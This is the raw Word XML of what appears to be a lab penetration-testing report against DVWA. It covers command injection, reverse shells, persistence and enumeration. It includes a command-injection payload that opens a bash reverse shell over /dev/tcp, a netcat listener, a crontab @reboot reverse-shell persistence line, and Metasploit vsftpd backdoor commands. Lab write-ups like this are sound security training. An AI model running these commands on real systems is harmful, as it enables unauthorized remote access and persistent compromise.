                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8E2672" w14:textId="72A4B5AE" w:rsidR="006C47BD" w:rsidRPr="00B40682" w:rsidRDefault="006C47BD" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Command Injection Web Exploitation (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE4DD3" w14:textId="6A4DD70A" w:rsidR="006C47BD" w:rsidRPr="00B40682" w:rsidRDefault="006C47BD"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application executed arbitrary system commands via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unsanitised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> input, revealing the server was running commands as the www-data user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167D7CB5"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3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6725F21C" w14:textId="061D7969" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00827135"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DVWA is selected as the simulated cloud server, so remote command execution can be tested using a simple reverse shell (MITRE T1059 Command Execution).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C60B84"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nc</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lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B49DA6" w14:textId="6C3D75AA" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00A07E3A"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127.0.0.1; /bin/bash -c 'bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/192.168.14.135/4444 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110A2D9"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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="251ECF20" w14:textId="4EC5B40A"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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCCBCE" w14:textId="1F61B331" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00A07E3A"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noProof/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02242E4E" wp14:editId="2FE2BE11">
            <wp:extent cx="3159932" cy="1360628"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="177421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16046" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3196332" cy="1376301"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2D77D1" w14:textId="0459641C" w:rsidR="00A07E3A" w:rsidRPr="00B40682" w:rsidRDefault="00A07E3A"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noProof/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74622F49" wp14:editId="5BDF794B">
            <wp:extent cx="3140036" cy="1331367"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="437873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73489" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3172044" cy="1344938"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="622354C2" w14:textId="6DF3EE2A" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc215851895"/>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 1</w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Reverse Shell Execution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="007775CA"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Attacker runs a listener (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) on 192.168.14.135:4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE7BA9" w14:textId="5FB01877" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00A07E3A"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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exploitation of a command injection vulnerability in DVWA successfully resulted in a reverse shell connection from the vulnerable web application to the Kali listener, confirming remote OS-level command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350ABB7E"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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C79F7B"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Persistence using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 xml:space="preserve"> job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403E26E9" w14:textId="0B511988"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(crontab -l 2&gt;/dev/null; echo "@reboot bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A07E3A" w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.14.135</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/4445 0&gt;&amp;1") | crontab -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B678632"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crontab -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9405EE" w14:textId="17A22941" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="000C7B7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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="431564ED" wp14:editId="7D0F4BC5">
            <wp:extent cx="5731510" cy="1174115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1131758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58695" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1174115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B44629" w14:textId="72C5AD35" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc215851896"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B13216" w:rsidRPr="00B40682">
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t>: Cron-Based Persistence Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="08F496C6" w14:textId="748A9064" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="000C7B7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After gaining command execution on the DVWA host, persistence could be achieved by modifying scheduled tasks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 xml:space="preserve"> jobs) to execute attacker-controlled scripts on system reboot. This would allow continued access even after system restarts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A48D16B"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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696C525" w14:textId="4E122271"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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8307F0" w14:textId="0B2C6C3F" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135"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find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2115FD07" w14:textId="2383C7BA" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="000C7B7A"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1191ED2F" wp14:editId="3A6E043C">
            <wp:extent cx="2825115" cy="1528877"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27475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58112" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2842735" cy="1538413"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="673AA83D" w14:textId="2C9A43D6" w:rsidR="00827135" w:rsidRPr="00B40682" w:rsidRDefault="00827135" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B40682">
        <w:t>Figure 17: Privilege Escalation (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9DF0E3" w14:textId="1DA4DF8D" w:rsidR="000C7B7A" w:rsidRPr="00B40682" w:rsidRDefault="000C7B7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 reverse shell was successfully obtained as the low-privileged www-data user, confirming initial command execution on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC09870" w14:textId="77777777" w:rsidR="000C7B7A" w:rsidRPr="00B40682" w:rsidRDefault="000C7B7A"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Enumeration revealed SUID binaries (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Xorg.wrap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dbus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-daemon-launch-helper), indicating potential local privilege escalation vectors, though direct </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> access was not permitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626B408" w14:textId="42DE21B9"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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D55EE9"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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p445 --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-shares 192.168.14.139 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> smb_scan.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6FFD7"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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="07B4D5E3" wp14:editId="6CB3045A">
            <wp:extent cx="3104719" cy="1272845"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="203145134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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3122876" cy="1280289"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B1A3DD" w14:textId="50861F37" w:rsidR="00AF28EE" w:rsidRPr="00B40682" w:rsidRDefault="00000000" w:rsidP="00C60D92">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc215851899"/>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00827135" w:rsidRPr="00B40682">
        <w:t>18:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:t xml:space="preserve"> SMB Enumeration Scan Results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="63E81712"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Port 445 detected but filtered, indicating the Windows Server is reachable but restricting SMB access, limiting lateral movement opportunities at this stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9F9C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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: C2 &amp; Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC93083" w14:textId="77777777" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5356D600" w14:textId="77777777" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; set RHOST 172.16.108.172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C919F" w14:textId="77777777" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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lastRenderedPageBreak/>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B40682">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="005E00"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/interact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B4F84" w14:textId="77777777" w:rsidR="00F60182" w:rsidRPr="00B40682" w:rsidRDefault="00F60182"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msf</w:t>
      </w:r>
